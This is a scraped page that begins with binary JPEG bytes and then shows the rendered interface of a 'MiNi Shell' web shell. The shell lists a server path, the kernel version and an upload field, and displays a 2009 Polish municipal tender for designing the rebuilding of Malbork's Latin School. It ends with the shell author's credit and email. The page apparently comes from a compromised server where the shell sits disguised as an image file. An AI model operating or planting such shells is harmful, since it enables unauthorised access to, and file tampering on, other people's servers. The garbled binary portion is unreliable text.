JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090930/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090930/339988-N-2009.html

<p class="kh_header"><b>Malbork: Projekt budowlany i  wykonawczy 
 Odbudowy i wprowadzenia nowych funkcji
 na terenie Szkoły Łacińskiej w Malborku</b><br>
<b>Numer ogłoszenia: 339988 - 2009; data zamieszczenia: 30.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Malborka , pl. Słowiański 5, 82-200 Malbork, woj. pomorskie, tel. 055 6473325, faks 055 6473324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt budowlany i  wykonawczy 
 Odbudowy i wprowadzenia nowych funkcji
 na terenie Szkoły Łacińskiej w Malborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rekomendacje dla odtworzenia Szkoły Łacińskiej i jej otoczenia:

1. W kontekście zachowanych źródłowych materiałów katastralnych, za najbardziej wiarygodną należy uznać rekonstrukcję Dobischa z 1924 r.
2. Wskazówki dla odbudowy Szkoły Łacińskiej uwzględniające wymogi ochrony historycznej panoramy Malborka od strony Nogatu
prace należy rozpocząć od weryfikacji obecnej wiedzy w ramach niezbędnych badań archeologiczno-architektonicznych; prace te mają zmienić poniższe założenia co do gabarytów obiektu i należy bezwzględnie je uwzględnić.
rzut budynku: ok. 17,0 m (od strony Nogatu) x 26(27) m;
układ dachu: dwuspadowy o układzie szczytowym ;
rzędna kalenicy dachu: maksymalnie 33,0 m n.p.m.;
kąt nachylenia połaci dachu: ok. 40 stopni;
materiał pokrycia dachu: dachówka ceramiczna (mnich-mniszka);
materiał elewacji od strony Nogatu: cegła licówka (gotycka).
3. Aktualna rzędna ulicy przymurnej wynosi ok. 19,0 m n.p.m. - należy jednak doprowadzić do odsłonięcia historycznej nawierzchni ulicy co doprowadzi do obniżenia rzędnej ulicy, co niesie konieczność weryfikacji wysokości zabudowy
4. Teren u stóp muru należy zagospodarować w nawiązaniu do funkcji nabrzeża portowego, widocznej na fotografiach z XIX w.

Przedmiotem zamówienia jest:
Etap I 
- wykonanie mapy do celów projektowych,
- wykonanie badań geologicznych - 3 kpl,
- wykonanie programu prac konserwatorskich i uzgodnienia go z Pomorskim   Wojewódzkim Konserwatorem Zabytków, na podstawie którego Wykonawca opracuje koncepcję i uzgodni ją z Inwestorem - Gminą Miejską Malbork oraz Pomorskim Wojewódzkim Konserwatorem Zabytków,
- wykonanie kompletnego wielobranżowego projektu budowlanego  adaptacji i rozbudowy Szkoły Łacińskiej dla funkcji opisanych powyżej (po 9 kpl na każdą branżę + 1 na nośniku elektronicznym),
- uzyskanie wszelkich niezbędnych prawem decyzji i uzgodnień, w tym pozwolenia na budowę,
- wykonanie Szczegółowej specyfikacji sprzętu i urządzeń przewidzianych do montażu w obiekcie, niezbędnych dla zakładanych funkcji poszczególnych pomieszczeń (po 3 kpl na każdą branżę + 1 na nośniku elektronicznym),
- określenie szacunkowych kosztów inwestycji z podziałem na branże,
- wstępny harmonogram rzeczowo - finansowy realizacji zadania.

Etap II
- badania archeologiczne - 3 kpl.,
- wykonanie kompletnego wielobranżowego projektu wykonawczego   adaptacji i
rozbudowy Szkoły Łacińskiej dla funkcji opisanych powyżej (po  9 kpl na każdą branżę + 1 na nośniku elektronicznym,
- opracowanie projektu aranżacji i wyposażenia wnętrz wraz ze specyfikacją techniczną w zakresie elementów wyposażenia meblowego i komputerowego obejmującego : 
a)Rzuty i przekroje pomieszczeń wraz ze szczególnym zwymiarowaniem oraz        rozmieszczeniem mebli i sprzętów,
b)Szczegółowe dyspozycje dotyczące rozwiązań materiałowych i kolorystycznych  sufitów, posadzek i ścian,
c)Dyspozycje dotyczące przyjętych rozwiązań w zakresie oświetlenia, sygnalizatorów instalacji alarmowych, kratek wentylacyjnych,
d)System identyfikacji wizualnej wewnętrznej i zewnętrznej (logotyp, tablice informacyjne, oznakowanie pomieszczeń),
e)Rysunki i opisy techniczne, zestawienia ilościowe, kalkulacje cenowe mebli i sprzętów stanowiących wyposażenie obiektu,
- wykonanie kompletnego wielobranżowego projektu budowlano - wykonawczego sieci wod-kan i C.O niezbędnych dla prawidłowego funkcjonowania obiektu kpl zgodnie z warunkami technicznymi  (po 9 kpl na każdą branżę + 1 na nośniku elektronicznym),
- Specyfikacjia Techniczna Wykonania i Odbioru Robót Budowlanych  (po 3 kpl na każdą branżę + 1 na nośniku elektronicznym),
- przedmiary robót (po 3 kpl na każdą branżę + 1 na nośniku elektronicznym),
- kosztorysy inwestorskie (po 3 kpl na każdą branżę+ 1 na nośniku elektronicznym),
- Zbiorcze Zestawienie Kosztów (3 kpl. + 1 na nośniku elektronicznym)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.00.00.00-9, 74.22.20.22-1, 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium
2.Ustala się wadium dla całości przedmiotu zamówienia w wysokości 15.000 zł , słownie:  piętnaście  tysięcy złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków udziału w postępowaniu:
1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności.
2. Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
2.1 Wykonawca musi wykazać, że w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania wykonał:
2.1.1 - min. 3 dokumentacje budowlane polegające na adaptacji, rozbudowie lub budowie obiektów użyteczności publicznej obejmującej w szczególności zaprojektowanie w nich funkcji edukacyjnych z uwzględnieniem wykorzystania nowoczesnych technologii m.in. Mediatek lub Multicentrów (minimum jedna z tych funkcji o kubaturze nie mniejszej niż 6.000 m3 i powierzchni użytkowej budynku nie mniejszej niż 1.400 m2).

2.1.2  -min. 2 dokumentacje budowlane wykonane na obiektach wpisanych do rejestru zabytków
2.2. Przedstawi koncepcję projektową w wersji papierowej i elektronicznej  zawierającą co najmniej :
        - koncepcję zagospodarowania terenu
        - rzuty poszczególnych kondygnacji z proponowanymi  rozwiązaniami 
        - przekrój poprzeczny
        - elewacje
        - wizualizaję 3 D
        - krótki opis rozwiązań funkcjonalnych i technicznych
2.3  Wykonawca musi dysponować lub przedstawi pisemne zobowiązanie innego podmiotu o udostępnieniu dla wykonawcy sprawnych maszyn i urządzeń niezbędnych dla wykonania zamówienia, 
3.  Wykonawca musi mieć do dyspozycji przy wykonaniu niniejszego zamówienia, osoby posiadające doświadczenie oraz kwalifikacje odpowiednie dla wykonania zamówienia, tj.: 
Wykonawca przedstawi w ofercie wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia takich osób, w tym obowiązkowo kandydatów na każde niżej wymienione stanowisko: 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunki określone w pkt.2. 
Wykonawca składając ofertę zobowiązuje się w przypadku podpisania umowy do skierowania do wykonania zamówienia osób wskazanych w ofercie. 
3.1 Wykonawca musi się znajdować  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia,  
3.2 Wykonawca nie może zalegać  z opłacaniem podatków, opłat i składek na ubezpieczenie zdrowotne i społeczne,
3.3 Wykonawca  musi  być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunki określone w pkt.3.2, 3.3spełniają łącznie. 
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art.24 ust 1 i 2 Pzp.
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenia i dokumenty złożone przez wykonawcę w niniejszym postępowaniu, metodą  warunku granicznego - spełnia -niespełnia.
6. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się wykonawców, którzy:
6.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w pkt. 1 do 3.
6.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień    publicznych.
6.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
6.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
6.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
6.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą.
7. Zamawiający odrzuca ofertę jeżeli:
7.1 jest niezgodna z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 ustawy  
7.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
7.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
7.4  została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia 
7.5 zawiera błędy w obliczeniu ceny, 
7.6 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art.87 ust.2 pkt 3 ustawy 
7.7 jest nieważna na podstawie odrębnych przepisów.
8. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
2. Formularz cenowy
3. Koncepcja projektowa
4. Istotne postanowienia do umowy  
5. Inne dokumenty  - opisane w pkt. B - G.

B. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
1. Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp; 
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia     do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed   upływem terminu składania ofert ; 
3. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ; 
4. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;
5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia     Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
6. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo powinno być złożone w oryginale. 
7. Pełnomocnictwo do podpisania oferty, o ile prawo do jego podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. Pełnomocnictwo powinno być złożone w oryginale.

C. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do  wykonania zamówienia należy złożyć następujące dokumenty: 

1. Wykaz wykonanych prac projektowych wraz z informacją o stanie procesu inwestycyjnego w ostatnich pięciu latach przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty  i miejsca wykonania.  Zadania odpowiadające swoim rodzajem i wartością i specyfiką  w tym  spełniające wymagania pkt  VI 2. SIWZ   stanowiącym przedmiot zamówienia prosimy wyraźnie zaznaczyć. Do wykazu należy dołączyć dokumenty potwierdzające, że wymienione w  wykazie zamówienia zostały wykonane należycie. 
2. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje lub będzie dysponował Wykonawca. 
3. Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt. 2 Wykonawca wskazał narzędzia i urządzenia , którymi będzie dysponował. 
4. Wykaz osób, którymi dysponuje  lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.  Informacja o doświadczeniu musi być podana w  rozbiciu na poszczególne usługi lub roboty, w ramach których dana osoba zdobywała kwalifikacje  
5. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania  zamówienia, jeżeli w wykazie, o którym mowa w pkt.4, Wykonawca wskazał osoby którymi będzie dysponował. 
6.  Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień, tj. przede wszystkim kopie uprawnień wraz z oświadczeniem lub decyzją o wpisie do GINB ( od 01.1995 r.) oraz kopie zaświadczeń o wpisie na odpowiednią listę zawodową osób przewidzianych przez Wykonawcę do pełnienia funkcji kierownika budowy i kierowników robót branżowych.

D. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 

1. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
2. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

1. Zamiast dokumentów, o których mowa w pkt. B.2, B.4, B.5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające    odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i    zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2. Zamiast dokumentu, o którym mowa w pkt B.3 , składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt  4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy
2. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B1, B2, B3, B4, B5, D  dla każdego partnera z osobna,  dokumenty opisane w pkt. B, C i G mogą być złożone wspólnie   

G. W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: 
1. referencje inwestorów potwierdzające należyte wykonanie przedmiotu umowy zgodnie z zapisami pkt.C.1.
2. Dokumentację fotograficzną zrealizowanych zadań ze szczególnym uwzględnieniem projektowanych w nich funkcji edukacyjnych z wykorzystaniem nowoczesnych technologii m.in. Mediatek lub Multicentrów. 

H. Postanowienia dotyczące składanych dokumentów
1. Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę/osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem-.
2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Koncepcja - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.malbork.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Malborka, Plac Słowiański 5, 82-200 Malbork, pokój 215 lub 217 II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 10:00, miejsce: Urząd Miasta Malborka Plac Słowiański 5, 82-200 Malbork pokój 115 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com